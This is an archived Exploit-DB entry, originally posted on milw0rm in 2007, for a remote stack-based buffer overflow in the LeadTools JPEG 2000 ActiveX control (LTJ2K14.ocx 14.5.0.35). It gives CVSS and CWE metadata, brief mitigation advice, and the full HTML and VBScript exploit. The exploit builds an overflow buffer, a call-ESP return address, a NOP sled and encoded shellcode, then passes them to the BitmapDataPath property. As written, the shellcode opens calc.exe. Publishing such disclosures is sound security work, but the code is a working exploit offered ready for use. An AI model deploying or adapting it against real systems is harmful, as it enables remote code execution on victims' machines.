LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow

vendor:

LeadTools JPEG 2000 COM Objejct

by:

shinnai

7.5

CVSS

HIGH

Remote Stack-Based Buffer Overflow

121

CWE

Product Name: LeadTools JPEG 2000 COM Objejct

Affected Version From: 14.5.0.35

Affected Version To: 14.5.0.35

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow

This exploit allows an attacker to overflow the stack buffer in the LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx) component, leading to remote code execution. The exploit opens the calculator (calc.exe) as a proof of concept.

Mitigation:

Apply the latest patches and updates for the LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx) component. Restrict access to the vulnerable component if possible. Use an alternative component if available.

Source

Exploit-DB raw data:

 <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/18</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------
 <b>LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow</b>
 url: http://www.leadtools.com/
 peice: eheheh, take a look at thier site :)
 
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 full patched with Internet Explorer 7

 <font color = red><b>This exploits just open calc.exe</b></font>
-----------------------------------------------------------------------------------------------

<object classid='clsid:00140020-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language = 'vbscript'>
 Sub tryMe()
  buff      = String(396, "A")

  get_EIP   = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)

  nop       = String(16, unescape("%90"))

  shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
              unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
              unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
              unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
              unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
              unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
              unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
              unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
              unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
              unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
              unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
              unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
              unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
              unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
              unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
              unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
              unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
              unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
              unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
              unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
              unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")

  egg       = buff + get_EIP + nop + shellcode + nop

  test.BitmapDataPath = egg
 End Sub

</script>
</span>
</code></pre>

# milw0rm.com [2007-05-18]